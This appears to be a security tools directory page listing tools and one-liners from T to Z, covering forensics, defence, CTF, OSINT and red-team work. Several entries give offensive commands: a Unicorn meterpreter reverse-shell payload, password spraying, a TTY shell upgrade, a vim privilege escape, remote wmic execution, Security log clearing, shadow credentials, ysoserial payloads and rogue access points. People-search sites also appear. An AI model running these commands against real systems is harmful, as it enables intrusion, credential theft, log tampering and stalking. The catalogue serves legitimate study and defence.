A quick awk pipeline that ranks source IPs by request count, the first thing to run on a log suspected of scanning or brute-force traffic.

awk '{print $1}' access.log | sort | uniq -c | sort -rn | head -20
added by THUGS(red)

toutatis tool

OSINT Recon

Resolves an Instagram username or numeric user ID to hashed email, hashed phone number and account-creation date via the platform's own API responses.

toutatis -u target_username
visit → added by THUGS(red)

Trace Labs OSINT VM tool Linux

CTF OSINT

Kali-based virtual machine pre-loaded with the OSINT tooling Trace Labs uses in its missing-persons CTFs, a ready-made environment rather than a single tool.

visit → added by THUGS(red)

Tracee tool Linux

Blue Team Cloud Defensive

Aqua Security's eBPF-based Linux runtime security and forensics tool — traces syscalls and events with a rules engine for detecting suspicious container/host behaviour live.

tracee --output json
visit → added by THUGS(red)

TREVORspray tool

Brute Force Cloud Red Team

Modular password-spraying tool with built-in modules for O365, Okta, OWA and more, plus optional proxying and Slack notifications for long-running sprays.

trevorspray -U users.txt -p Summer2026! --module o365enum
visit → added by THUGS(red)

Triage (tria.ge) tool

Blue Team Malware

Hatching's automated malware sandbox — detonates a submitted sample across multiple Windows/Linux/Android profiles and returns behavioural reports, extracted configs and IOCs, with a free tier for public submissions.

visit → added by THUGS(red)

Triton tool

Binary / RE CTF Research

Dynamic binary analysis library combining symbolic execution and taint analysis, usable as a scriptable engine for deobfuscation and constraint solving in RE work.

visit → added by THUGS(red)

Trivy tool

Blue Team Cloud Defensive

Aqua Security's all-in-one scanner — container images, filesystems, IaC and git repos for known CVEs, secrets and misconfigurations, fast enough to run in every CI pipeline.

trivy image myapp:latest
visit → added by THUGS(red)

TruePeopleSearch tool

OSINT

Free US people-search site returning address history, phone numbers and named relatives from public records without a paywall.

visit → added by THUGS(red)

Turbinia tool Linux

Blue Team Cloud Forensics

Google's automation framework for running forensic tools (Plaso, bulk_extractor, YARA and more) as a distributed pipeline against cloud-scale evidence, so a large IR engagement is not bottlenecked on one analyst's workstation.

visit → added by THUGS(red)

Turbo Intruder tool

Brute Force Fuzzing Web

High-throughput HTTP request engine (Python-scripted) built for large brute-force jobs and race-condition testing that would be too slow through a regular intercepting proxy.

visit → added by THUGS(red)

Turn archived URLs into a list of endpoints that respond today one-liner

Recon Web

Chains tomnomnom's waybackurls with ProjectDiscovery's httpx to turn archived history into a live-host check in one pipeline.

echo example.com | waybackurls | httpx -silent
visit → added by THUGS(red)

Twint (archived) tool

OSINT Recon

Advanced Twitter/X scraping tool that historically worked without API keys or rate limits; the project is archived/broken against the current X platform but still referenced in OSINT methodology write-ups.

visit → added by THUGS(red)

UAC (Unix-like Artifacts Collector) tool Linux

Blue Team Forensics

A live-response shell script for Linux, macOS, AIX and Solaris that collects volatile and forensic artifacts (processes, network state, logs, persistence points) into a single archive — the Unix-world counterpart to KAPE.

./uac -p full /tmp/triage
visit → added by THUGS(red)

Ubertooth One tool

Hardware Wireless / WiFi

Open-source USB Bluetooth (Classic and BLE) monitoring hardware plus its host tools, for sniffing and following connections that a normal Bluetooth adapter's firmware hides.

ubertooth-btle -f -c capture.pcap
visit → added by THUGS(red)

UFADE tool

Blue Team Forensics Mobile

Unofficial iOS backup extractor — pulls an unencrypted or password-known iTunes-style backup off a device and organises it for handoff to iLEAPP or manual review.

visit → added by THUGS(red)

Uncoder.io tool

Blue Team Defensive

SOC Prime's free online translator between Sigma, SPL, KQL, EQL, YARA-L and other query languages — paste a Sigma rule, get a ready query for your SIEM.

visit → added by THUGS(red)

Unicorn tool Windows

Payloads Red Team

Generates a PowerShell downgrade-attack payload (magic unicorn) that bypasses application whitelisting and injects shellcode straight into memory.

python3 unicorn.py windows/meterpreter/reverse_https 10.10.14.7 443
visit → added by THUGS(red)

Unicorn Engine tool

Binary / RE CTF

Lightweight, multi-architecture CPU emulator library used to run a snippet of machine code (or an entire firmware routine) in isolation to observe its behaviour without real hardware.

visit → added by THUGS(red)

Universal Radio Hacker (URH) tool

Fuzzing Research SDR / RF

GUI workbench for reverse-engineering unknown radio protocols — demodulate, decode and re-encode signals, then fuzz them, without writing GNU Radio flowgraphs by hand.

visit → added by THUGS(red)

Upgrade a dumb shell to a real TTY one-liner Linux

CTF Offensive Red Team

Turns a bare reverse/bind shell into a full interactive TTY with job control, tab completion and arrow keys.

python3 -c 'import pty;pty.spawn("/bin/bash")'
# then background it and fix the terminal:
# ^Z
stty raw -echo; fg
export TERM=xterm; stty rows 50 cols 200
added by THUGS(red)

UPX tool

Binary / RE CTF

The ultimate packer for executables — used legitimately to shrink binaries, but in CTF reversing it usually shows up the other way round: unpacking a UPX-wrapped challenge binary.

upx -d packed_binary
visit → added by THUGS(red)

URLhaus tool

Blue Team Malware Research

abuse.ch project tracking URLs actively distributing malware, with a searchable database and downloadable blocklists for defensive use.

visit → added by THUGS(red)

URLScan.io tool

Blue Team Research Web

Free sandboxed URL scanner that renders a page, records every request it makes, and archives screenshots and the DOM — used to safely inspect a suspicious link before clicking it.

visit → added by THUGS(red)

URLVoid tool

Defensive OSINT Research

Checks a website's reputation against multiple blacklist and reputation engines at once, a quick sanity check before visiting an unfamiliar link.

visit → added by THUGS(red)

USB Armory tool

Hardware Red Team

Open-source, USB-stick-sized ARM computer running full Linux — used to build a self-contained portable pentest/forensics/HSM-style implant that presents as an ordinary USB device.

added by THUGS(red)

USENIX Security Symposium Proceedings tool

Research

Freely available full proceedings of USENIX Security, one of the top academic venues for systems-security research, with papers going back decades.

visit → added by THUGS(red)

Validate a domain's DNSSEC chain of trust one-liner Linux

DNS Research

delv (shipped with BIND) walks the DNSSEC chain from the root down and reports exactly where validation succeeds or breaks, which dig alone won't show.

delv +rtrace example.com
added by THUGS(red)

VECTR tool

Blue Team Defensive

Security Risk Advisors' free platform for tracking purple team exercises — records which attack techniques were run, what was detected, and where a gap needs a new rule.

visit → added by THUGS(red)

Velociraptor tool

Blue Team Defensive Forensics

Endpoint visibility and DFIR platform — a query language (VQL) for hunting across a fleet of endpoints, collecting artifacts and monitoring in near-real-time rather than imaging one box at a time.

velociraptor -v --config server.config.yaml frontend
visit → added by THUGS(red)

Verify a file Authenticode signature one-liner Windows

Blue Team Forensics

A quick way to confirm whether a binary someone dropped is signed and by whom, before deciding whether to trust or detonate it.

certutil -verify -urlfetch payload.exe
added by THUGS(red)

Verify code signature and entitlements one-liner macOS

Blue Team Forensics

codesign confirms whether a binary is signed at all and by whom, and lists exactly what it is entitled to do at runtime.

codesign -dv --verbose=4 /Applications/Suspicious.app
codesign -d --entitlements :- /Applications/Suspicious.app
added by THUGS(red)

Verify loaded kernel module signatures one-liner Linux

Blue Team Forensics

On a system with module signing enforced, an unsigned loaded module is close to a smoking gun for tampering.

for m in $(lsmod | awk 'NR>1{print $1}'); do modinfo $m | grep -q '^sig_id' || echo "unsigned: $m"; done
added by THUGS(red)

ViewDNS.info tool

DNS OSINT Recon

Free suite of small DNS/network lookup tools — reverse WHOIS, reverse IP, DNS history, port scan — useful when you need one quick answer without standing up your own tooling.

visit → added by THUGS(red)

Villain tool

Offensive Payloads Red Team

Terminal-based C2 for managing and pivoting between multiple reverse/bind shells over HoaxShell-style HTTP payloads, with shell sharing between attacker machines.

python3 Villain.py
visit → added by THUGS(red)

vim — break out to a shell from a SUID/sudo editor one-liner Linux

CTF LOLBAS / LOTL Red Team

vim's :! escape runs a shell command — with sudo vim or a SUID vim binary that shell inherits the elevated privilege.

vim -c ':!/bin/sh'
visit → added by THUGS(red)

VirusTotal tool

Blue Team Malware Research

Multi-engine file/URL/domain/IP reputation lookup aggregating dozens of AV engines and sandboxes — the standard first stop for triaging a suspicious sample or link.

visit → added by THUGS(red)

Volatility tool

Blue Team CTF Forensics

The standard open-source memory forensics framework — extracts processes, network connections, injected code and more from a RAM capture across Windows, Linux and macOS.

vol -f memdump.raw windows.pslist
visit → added by THUGS(red)

Volatility Workbench tool Windows

Blue Team Forensics

Free GUI front-end for the Volatility memory forensics framework — point-and-click access to plugins for analysts who prefer not to live in the CLI.

visit → added by THUGS(red)

VulDB tool

Research

Community-driven vulnerability database with its own numeric risk scoring alongside CVSS, and exploit/patch availability tracking per entry.

visit → added by THUGS(red)

Vulmon tool

Research Search Engines

Vulnerability intelligence search engine tracking newly disclosed CVEs, linked exploits and vendor patches, with free email alerts by product.

visit → added by THUGS(red)

VulnCheck tool

Research

Vulnerability intelligence platform tracking real-world exploitation and public PoC availability for CVEs, going beyond static CVSS scoring.

visit → added by THUGS(red)

Vulnerability Lab tool

Research

Independent full-disclosure vulnerability research archive with detailed technical write-ups, often published ahead of or alongside vendor patches.

visit → added by THUGS(red)

Vulners tool

Research

Aggregated vulnerability intelligence database and API pulling together CVEs, vendor advisories, exploit-DB entries and patch data in one searchable feed, with Nmap/Burp integrations.

visit → added by THUGS(red)

VX-Underground tool

Blue Team Malware Research

Large public archive of malware samples, source code leaks and research papers — the go-to reference library for malware researchers looking up a family or campaign.

visit → added by THUGS(red)

WADComs tool Windows

Cheat Sheets Enumeration Red Team

GTFOBins-style interactive cheat sheet for offensive Windows/Active Directory commands (PowerShell, WMI, native binaries) covering recon through lateral movement.

visit → added by THUGS(red)

Wafw00f tool

Enumeration Recon Web

Identifies and fingerprints which web application firewall (if any) is protecting a target site, based on response behaviour to a set of probes.

wafw00f https://example.com
visit → added by THUGS(red)

Wappalyzer tool

OSINT Recon Web

Browser extension and API that fingerprints the technology stack of a website (CMS, JS frameworks, server software, analytics) from passive page signals.

visit → added by THUGS(red)

WavSteg tool

CTF Steganography

LSB steganography tool for hiding and extracting data in WAV audio files, part of a small suite alongside a matching PNG LSB tool.

python3 WavSteg.py -r -s cover.wav -o out.txt -n 2
visit → added by THUGS(red)

Wayback Machine tool

OSINT Recon Research

Internet Archive's historical web snapshot service — recovers deleted pages, old site structure, past staff/contact pages and prior versions of JS/robots.txt for recon.

visit → added by THUGS(red)

waybackurls tool

OSINT Recon Web

Pulls every URL the Wayback Machine has ever archived for a domain — a quick, passive way to surface old endpoints, parameters and forgotten paths that are still live.

echo target.tld | waybackurls
visit → added by THUGS(red)

Wazuh tool

Blue Team Defensive Forensics

A free, open-source XDR/SIEM platform — log analysis, file integrity monitoring, vulnerability detection and rootcheck/rootkit detection from a fleet of lightweight agents, built as an OSSEC fork with a modern stack around it.

visit → added by THUGS(red)

Weakpass tool

Brute Force Wordlists

Site hosting large curated password wordlists (compiled from breaches and generated sets) plus a hash-lookup search, aimed squarely at cracking rather than fuzzing.

visit → added by THUGS(red)

wevtutil — clear a Windows event log channel one-liner Windows

Blue Team LOLBAS / LOTL Red Team

wevtutil is the signed, built-in way to clear an event log channel — worth knowing for blue-team log-tampering detection just as much as red-team tradecraft.

wevtutil cl Security
visit → added by THUGS(red)

whatsmydns.net tool

DNS

Checks DNS record propagation for a domain across dozens of resolvers worldwide, useful for confirming whether a change has actually gone global yet.

visit → added by THUGS(red)

WhatsMyName tool

OSINT Recon

Username-enumeration project (web UI and open JSON data set) that checks a handle across hundreds of sites, maintained as a community-curated alternative to Sherlock's site list.

visit → added by THUGS(red)

WhatWeb tool

Enumeration OSINT Recon Web

CLI website fingerprinting tool with 1800+ plugins identifying CMS, JS libraries, web servers and embedded devices from HTTP responses.

whatweb -a 3 https://example.com
visit → added by THUGS(red)

Whisker tool Windows

Offensive Red Team

Adds/lists/removes "Shadow Credentials" (msDS-KeyCredentialLink) on an AD object to authenticate as it via PKINIT without knowing its password.

Whisker.exe add /target:victim$
visit → added by THUGS(red)

Whoxy tool

DNS Recon

Bulk and reverse WHOIS lookup service — finds every other domain registered with the same email address or registrant name.

visit → added by THUGS(red)

WiFi Pineapple tool

Hardware Red Team Wireless / WiFi

Hak5's dedicated rogue-AP/MITM hardware appliance — recon, karma/evil-twin attacks and traffic capture through a web dashboard and a modules ecosystem, built for field engagements.

visit → added by THUGS(red)

Wifiphisher tool Linux

Offensive Red Team Wireless / WiFi

Rogue access point framework built around social-engineering captive portals (fake firmware upgrade, router config pages) rather than brute-forcing the handshake.

sudo wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade
visit → added by THUGS(red)

Wifite2 tool Linux

Brute Force Red Team Wireless / WiFi

Python rewrite of the "point it at every visible network" Wi-Fi auditing wrapper — automates monitor mode, handshake/PMKID capture and WPS attacks via aircrack-ng/hcxtools/reaver/bully.

sudo wifite --dict /path/to/wordlist.txt
# target one BSSID only:
sudo wifite -e "Target-SSID" --dict wordlist.txt
visit → added by THUGS(red)

WiGLE.net tool

Device Search OSINT Wireless / WiFi

Crowd-sourced database and search engine of wireless networks (Wi-Fi, Bluetooth, cellular) mapped by GPS location, built from years of wardriving submissions.

visit → added by THUGS(red)

Wikimapia tool

OSINT Recon

User-annotated satellite map where buildings and points of interest carry free-text descriptions, useful for identifying an unnamed structure in a photo.

visit → added by THUGS(red)

WinAFL tool Windows

Binary / RE Fuzzing

Google Project Zero's fork of AFL targeting Windows binaries, using DynamoRIO instrumentation to fuzz closed-source Windows executables and DLLs.

visit → added by THUGS(red)

WinPmem tool Windows

Blue Team Forensics

Free, open-source Windows memory acquisition tool — dumps physical RAM to a raw or AFF4 image for later Volatility/Rekall/MemProcFS analysis.

winpmem.exe memory.raw
visit → added by THUGS(red)

WireGuard tool

Network VPN / Anonymity

Modern, minimal-codebase VPN protocol/implementation built into the Linux kernel — the underlying tunnel tech behind most current commercial and self-hosted VPN setups.

wg-quick up wg0
visit → added by THUGS(red)

Wireshark tool

Blue Team CTF Forensics Network

The world's most widely used network protocol analyzer — deep inspection of hundreds of protocols, live capture and offline analysis, with a filter language everyone in the field eventually learns.

wireshark -i eth0 -k
visit → added by THUGS(red)

wmic — start a process on a remote host one-liner Windows

LOLBAS / LOTL Red Team

Given valid credentials, wmic can start a process on a remote machine — a built-in lateral-movement primitive that needs no extra tooling on disk.

wmic /node:10.10.10.10 /user:DOMAIN\user /password:pass process call create "cmd.exe /c whoami > C:\out.txt"
visit → added by THUGS(red)

WPScan tool

Enumeration Red Team Web

A black-box WordPress security scanner — enumerates plugins, themes and users, and checks versions against a maintained vulnerability database.

wpscan --url https://target.tld --enumerate vp,vt,u
visit → added by THUGS(red)

X-Ways Forensics tool Windows

Blue Team Forensics

Lightweight, fast commercial disk forensics suite — a long-standing favourite among examiners for its speed and low resource footprint on very large images compared to heavier platforms.

visit → added by THUGS(red)

x64dbg tool Windows

Binary / RE CTF

Open-source user-mode x86/x64 debugger for Windows with a plugin ecosystem (ScyllaHide, x64dbgpy) that is the de facto free alternative to OllyDbg/Immunity on modern binaries.

visit → added by THUGS(red)

XOR-decrypt against a known-plaintext crib one-liner

Ciphers Cryptography CTF

Recovers a repeating XOR key by XOR-ing ciphertext against a guessed plaintext fragment (a crib like "flag{"), a fast manual technique when the key is shorter than or equal to the crib.

python3 -c "
ct = bytes.fromhex('...')
crib = b'flag{'
print(bytes(c ^ k for c, k in zip(ct, crib)))
"
added by THUGS(red)

xortool tool

Ciphers Cryptography CTF

Guesses the key length of a repeating-key XOR ciphertext from character-frequency analysis, then recovers the most likely key.

xortool ciphertext.bin -l 4
visit → added by THUGS(red)

Xplico tool Linux

Blue Team Forensics Network

Network forensic analysis tool (NFAT) — reconstructs application-layer content (emails, VoIP calls, HTTP content, chat) from a pcap for post-capture investigation.

visit → added by THUGS(red)

XSStrike tool

Fuzzing Payloads Red Team Web

A cross-site scripting detection suite that fuzzes parameters with a context-aware payload generator, rather than firing a static payload list at everything.

python3 xsstrike.py -u "https://target.tld/search?q=test"
visit → added by THUGS(red)

Xtreme Firmware tool

Hardware NFC / RFID Wireless / WiFi

Feature-maximalist community custom firmware for Flipper Zero — bundles extra sub-GHz frequencies/protocols, apps and unlocks beyond what the stock firmware ships.

visit → added by THUGS(red)

YAF (Yet Another Flowmeter) tool Linux

Blue Team Network

CERT NetSA's IPFIX-compliant flow generator — turns raw pcap into flow records with deep packet inspection metadata for downstream SiLK-style analysis.

yaf --in capture.pcap --out flow.yaf --silk
visit → added by THUGS(red)

yafu tool

Cryptography CTF

"Yet Another Factoring Utility" — automatically picks and runs the best available factoring algorithm (ECM, SIQS, NFS) for a given integer, useful once a modulus is too big for trial division.

./yafu "factor(n)"
visit → added by THUGS(red)

Yandex Images tool

OSINT Research

Reverse image search engine with notably better face and landmark matching than Google/Bing for OSINT work, especially outside the US/EU.

visit → added by THUGS(red)

YARA tool

Blue Team Forensics Malware

A pattern-matching engine purpose-built for malware research — write rules describing families of malicious files, then scan a filesystem or memory image against them at speed.

yara rules.yar suspicious_file
visit → added by THUGS(red)

YARA-X tool

Blue Team Malware

VirusTotal's ground-up Rust rewrite of the YARA scanning engine — a drop-in-compatible, faster and memory-safer replacement for the original C implementation, maintained by the same team.

yr scan rules.yar sample.bin
visit → added by THUGS(red)

yarGen tool

Blue Team Defensive Malware

Generates YARA rules from a set of malware samples, using string frequency scoring against a large goodware corpus to avoid noisy, false-positive-prone signatures.

python3 yarGen.py -m /malware_samples/ -o generated.yar
visit → added by THUGS(red)

Yeti tool

Blue Team Defensive Research

"Your Everyday Threat Intelligence" — a platform for aggregating and de-duplicating observables, TTPs and threat data from multiple feeds into one queryable, taggable repository for an analyst team to build on.

visit → added by THUGS(red)

ysoserial tool

Payloads Red Team Web

Generates payloads that exploit unsafe Java object deserialization across a wide range of common libraries — the standard reference tool for Java deserialisation attacks.

java -jar ysoserial.jar CommonsCollections6 "id" > payload.bin
visit → added by THUGS(red)

Z3 tool

Binary / RE Cryptography CTF

Microsoft's SMT solver, used constantly in CTF reversing and crypto to turn 'find x such that these constraints hold' into a script instead of manual algebra — a frequent shortcut past custom validation logic.

python3 -c "
from z3 import *
x = BitVec('x', 32)
s = Solver()
s.add(x * 3 + 7 == 100)
print(s.check(), s.model())
"
visit → added by THUGS(red)

Z3 Theorem Prover tool

Binary / RE Cryptography CTF

Microsoft Research's SMT solver, scripted from Python to encode a challenge's constraints (a keygen check, a crypto relation, a logic puzzle) and let the solver produce a satisfying input.

python3 -c "from z3 import *; s = Solver()"
visit → added by THUGS(red)

ZabaSearch tool

OSINT

Free US people-search engine returning addresses and phone numbers, one of the older sites in this space and still commonly cited in OSINT methodology.

visit → added by THUGS(red)

Zabbix tool

Blue Team Defensive Network

Enterprise-grade open-source monitoring platform — network, server and application monitoring with alerting, widely used as the backbone of an internal visibility/blue-team baseline.

visit → added by THUGS(red)

Zeek (formerly Bro) tool Linux

Blue Team Defensive Network

A network security monitor rather than a signature-matching IDS — transforms traffic into rich, structured logs (connections, DNS, HTTP, files…) that a SOC actually hunts through.

zeek -r capture.pcap
visit → added by THUGS(red)

Zero Day Initiative Advisories tool

Research

Public advisories from Trend Micro's ZDI bug-bounty program, published once a vendor patches or a disclosure deadline passes, with technical root-cause detail.

visit → added by THUGS(red)

Zircolite tool

Blue Team Forensics

A standalone SIGMA detection engine for EVTX (and Sysmon-for-Linux/auditd JSON) — runs the same Sigma rule set as a SIEM directly against exported logs when there is no SIEM to hand.

python3 zircolite.py --evtx evtx_dir/ --ruleset rules/rules_windows_generic.json
visit → added by THUGS(red)

ZMap tool Linux

Blue Team Network Research

An internet-wide, single-packet network scanner built for research-scale sweeps of the whole IPv4 address space on a single port, rather than deep per-host scanning of a target list.

zmap -p 443 -o results.csv
visit → added by THUGS(red)

Zonemaster tool

DNS Research

A DNS and DNSSEC health-check tool developed by .SE and AFNIC — runs dozens of correctness and best-practice tests against a domain's DNS delegation and reports misconfigurations before they cause an outage or a security gap.

visit → added by THUGS(red)

ZoomEye tool

Device Search OSINT Recon Search Engines

Chinese-run internet device/service search engine indexing banners, ports and web components, comparable in scope to Shodan/Censys with different vantage points.

visit → added by THUGS(red)

zsteg tool

CTF Steganography

Detects hidden data stashed in the low bits of PNG and BMP pixel data — the standard second stego check after steghide comes up empty on an image.

zsteg -a image.png
visit → added by THUGS(red)

zzuf tool Linux

Binary / RE Fuzzing

Transparent input fuzzer that randomly flips bits in a program's input stream via LD_PRELOAD, a quick way to probe robustness without instrumenting the target.

zzuf -s 0:100 ./parser input.bin
visit → added by THUGS(red)